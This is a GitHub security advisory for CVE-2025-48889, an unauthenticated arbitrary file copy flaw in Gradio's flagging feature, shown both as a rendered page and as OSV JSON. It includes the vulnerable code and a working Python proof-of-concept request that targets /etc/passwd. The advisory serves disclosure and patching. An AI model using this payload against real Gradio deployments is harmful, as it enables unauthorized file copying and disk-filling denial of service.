ghsa-8jw3-6x8j-v96g
Vulnerability from github
Published
2025-05-29 22:36
Modified
2025-05-30 15:18
Severity ?
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Summary
Gradio Allows Unauthorized File Copy via Path Manipulation
Details

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.

Description

The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies.

Source: User-controlled path parameter in the flagging functionality JSON payload
Sink: shutil.copy operation in FileData._copy_to_dir() method

The vulnerable code flow: 1. A JSON payload is sent to the /gradio_api/run/predict endpoint 2. The path field within FileData object can reference any file on the system 3. When processing this request, the Component.flag() method creates a GradioDataModel object 4. The FileData._copy_to_dir() method uses this path without proper validation:

```python def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self)

if not self.path:
    raise ValueError("Source file path is not set")
new_name = shutil.copy(self.path, dir)  # vulnerable sink
new_obj["path"] = new_name
return self.__class__(**new_obj)

``` 5. The lack of validation allows copying any file the Gradio process can read

PoC

The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory:

Setup a Gradio app:

```python import gradio as gr

def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8}

test = gr.Interface(fn=image_classifier, inputs="image", outputs="label")

test.launch(share=True) ```

Run the PoC:

```python import requests

url = "https://[your-gradio-app-url]/gradio_api/run/predict"
headers = { "Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" }

payload = { "data": [ { "path": "/etc/passwd",
"url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000,
"mime_type": "text/plain", "meta": { "_type": "gradio.FileData"
} }, {}
], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123"
}

response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") ```

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T22:36:59Z",
    "nvd_published_at": "2025-05-30T06:15:28Z",
    "severity": "MODERATE"
  },
  "details": "An arbitrary file copy vulnerability in Gradio\u0027s flagging feature allows unauthenticated attackers to copy any readable file from the server\u0027s filesystem. While attackers can\u0027t read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.\n\n### Description\nThe flagging component doesn\u0027t properly validate file paths before copying files. Attackers can send specially crafted requests to the `/gradio_api/run/predict` endpoint to trigger these file copies.\n\n**Source**: User-controlled `path` parameter in the flagging functionality JSON payload  \n**Sink**: `shutil.copy` operation in `FileData._copy_to_dir()` method\n\nThe vulnerable code flow:\n1. A JSON payload is sent to the `/gradio_api/run/predict` endpoint\n2. The `path` field within `FileData` object can reference any file on the system\n3. When processing this request, the `Component.flag()` method creates a `GradioDataModel` object\n4. The `FileData._copy_to_dir()` method uses this path without proper validation:\n\n```python\ndef _copy_to_dir(self, dir: str) -\u003e FileData:\n    pathlib.Path(dir).mkdir(exist_ok=True)\n    new_obj = dict(self)\n\n    if not self.path:\n        raise ValueError(\"Source file path is not set\")\n    new_name = shutil.copy(self.path, dir)  # vulnerable sink\n    new_obj[\"path\"] = new_name\n    return self.__class__(**new_obj)\n```\n5. The lack of validation allows copying any file the Gradio process can read\n\n### PoC\nThe following script demonstrates the vulnerability by copying `/etc/passwd` from the server to Gradio\u0027s flagged directory:\n\n\nSetup a Gradio app:\n\n```python\nimport gradio as gr\n\ndef image_classifier(inp):\n    return {\u0027cat\u0027: 0.2, \u0027dog\u0027: 0.8}\n\ntest = gr.Interface(fn=image_classifier, inputs=\"image\", outputs=\"label\")\n\ntest.launch(share=True)\n```\n\nRun the PoC:\n\n```python\nimport requests\n\nurl = \"https://[your-gradio-app-url]/gradio_api/run/predict\"  \nheaders = {\n    \"Content-Type\": \"application/json\",  \n    \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36\" \n}\n\npayload = {\n    \"data\": [\n        {\n            \"path\": \"/etc/passwd\",  \n            \"url\": \"[your-gradio-app-url]\",\n            \"orig_name\": \"network_config\", \n            \"size\": 5000,  \n            \"mime_type\": \"text/plain\", \n            \"meta\": {\n                \"_type\": \"gradio.FileData\"  \n            }\n        },\n        {}  \n    ],\n    \"event_data\": None,\n    \"fn_index\": 4, \n    \"trigger_id\": 11, \n    \"session_hash\": \"test123\"  \n}\n\nresponse = requests.post(url, headers=headers, json=payload)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Body: {response.text}\")\n```",
  "id": "GHSA-8jw3-6x8j-v96g",
  "modified": "2025-05-30T15:18:21Z",
  "published": "2025-05-29T22:36:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-8jw3-6x8j-v96g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48889"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gradio Allows Unauthorized File Copy via Path Manipulation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.